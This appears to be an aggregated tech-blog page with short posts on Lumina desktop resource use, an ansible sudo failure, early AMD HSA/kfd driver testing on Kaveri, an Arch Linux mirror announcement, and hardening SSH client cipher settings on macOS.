By the way, here is a quick usage summary for those that are interested in how “light” Lumina 0.6.2 is on PC-BSD 10.0.3:

System: Netbook with a single 1.6GHz Atom processor and 2GB of memory (fresh installation of PC-BSD 10.0.3 with Lumina 0.6.2)

Usage: ~0.2–0.4% CPU and ~120MB active memory use (no apps running except an xterm with “top” after a couple minutes for the PC-BSD tray applications to start up and settle down)


When ssh and ansible play poorly together

by Dan Langille via Dan Langille's Other Diary »

Last night, this worked fine. This morning, it fails:

# ansible-playbook jail-mailjail.yml

PLAY [mailjails] **************************************************************

GATHERING FACTS ***************************************************************
failed: [mailjail.example.org] => {"failed": true, "parsed": false}
invalid output was: Sorry, try again.
Sorry, try again.
Sorry, try again.
sudo: 3 incorrect password attempts

TASK: [pkg | install pkg] *****************************************************
FATAL: no hosts matched or all hosts [...]

AMD HSA

by Patrick via Patrick's playground »

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, which AMD calls "HSA": Heterogeneous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:
[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)
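After dropping that file in place, the usual way to have udev pick it up without rebooting would be something along these lines (standard udevadm invocations, not taken from the original post):

# reload the rules and re-trigger events so /dev/kfd gets the new mode
udevadm control --reload-rules
udevadm trigger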

AMD has provided a small shell script to test if things work:
# ./kfd_check_installation.sh 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways.
These ebuilds can be found here.

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included; it mostly works, but appears to go into an infinite loop. Output looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
^C
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

Spieglein, Spieglein

by Jesco Freund via My Universe »

With the latest update of the pacman mirrorlist, my Arch Linux mirror server has been included as an official Tier 2 mirror. The mirror is reachable at archlinux.my-universe.com, supports rsync in addition to HTTP and HTTPS, and is accessible over both IPv4 and IPv6.
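For pacman users, hooking the mirror in comes down to one line in /etc/pacman.d/mirrorlist. The path below merely follows the usual Arch mirror layout and is an assumption, not something stated in the announcement:

## archlinux.my-universe.com (HTTPS; verify the actual path on the mirror itself)
Server = https://archlinux.my-universe.com/$repo/os/$arch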

SSH client configuration on MacOS

by Karsten via Security-Planet.de »

While writing the last post on SSH configuration under Cisco IOS and Cisco ASA, it occurred to me that sensible adjustments to the client configuration deserve a write-up as well. At least on MacOS (and at least on Debian and older Ubuntu Linux, too), the optimal cryptography is not always used by default.
The SSH parameters can be configured in two places:

  • system-wide in /etc/ssh_config
  • per user in ~/.ssh/config
The system-wide SSH config contains, for example, the following three lines, which determine large parts of the cryptography in use (strictly speaking, they show the defaults):

#Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour
#KexAlgorithms ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
#MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96
What can or should be changed:

Ciphers

If you don't have any legacy systems to maintain, you could remove all non-AES ciphers. But devices like 2950 switches are still encountered every now and then, so in such a case 3des-cbc has to stay configured as well. The Ciphers line could then look like this:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
According to the man page (and based on OpenSSH 6.2p2, the version used on both Mavericks and Yosemite), the more modern GCM variants should be supported as well. If they are configured, however, the SSH client reports "Bad SSH2 cipher spec".
When accessing Cisco routers and switches, the CBC variants are typically negotiated, since CTR is only supported from IOS 15.4 onwards.

KexAlgorithms
This controls the key exchange. My config line on the Mac is the following:

KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I removed the elliptic curve algorithms, since they are suspected of containing backdoors. The presumably trustworthy curve25519 by D. J. Bernstein is only included as of OpenSSH 6.6p1; I will add it once that version is available. The last entry in the line is still a group1 exchange (a 1024-bit group), which is needed for legacy devices.

MACs
What bothers me most is that an MD5 method has the highest priority, followed by a SHA1 method. The order should be adjusted:

MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
The etm MACs are interesting; they call for a small digression into message authentication codes. By default, the protocols SSL, IPsec and SSH use different approaches to encrypting the data and protecting its integrity:

  • SSL: mac-then-encrypt. The MAC is computed first, then data and MAC are encrypted together.
  • IPsec: encrypt-then-mac. The data is encrypted first, and the MAC is then computed over the ciphertext.
  • SSH: encrypt-and-mac. The data is encrypted, but the MAC is computed over the plaintext.
It has turned out that of these three options, the method used by IPsec is the most secure one. These encrypt-then-mac (etm) schemes can also be used with SSH.

So what changes when accessing an IOS device? Without these adjustments, the SSH session looks like this (on a Cisco 3560 with IOS 15.0(2)SE5):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	            Username
1          2.0     IN   aes128-cbc  hmac-md5     Session started   ki
1          2.0     OUT  aes128-cbc  hmac-md5     Session started   ki
aes128-cbc with an MD5 HMAC is used. After the changes, the crypto is somewhat better (within the limits of what IOS offers):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	           Username
0          2.0     IN   aes256-cbc  hmac-sha1    Session started   ki
0          2.0     OUT  aes256-cbc  hmac-sha1    Session started   ki
Here, once again, is the resulting ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
Update:
After some thought I came to the conclusion that I don't really like having the legacy algorithms in the config file. So I threw them out again and specify the required crypto directly when connecting to older devices. Here is an example for accessing a 2950:

ssh -l ki 10.10.10.200 -o Ciphers="3des-cbc" -o KexAlgorithms="diffie-hellman-group1-sha1"
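If typing those options every time gets tedious, the same overrides can also live in a host-specific block in ~/.ssh/config instead (placed before the global Ciphers/KexAlgorithms lines, since for each parameter the first value found wins). A minimal sketch; the host alias is hypothetical, the address and user are taken from the example above:

Host c2950
    HostName 10.10.10.200
    User ki
    Ciphers 3des-cbc
    KexAlgorithms diffie-hellman-group1-sha1

A plain ssh c2950 then picks up the legacy crypto only for that one device.
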
And here is the adjusted ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
Further suggestions for improvement are gladly accepted.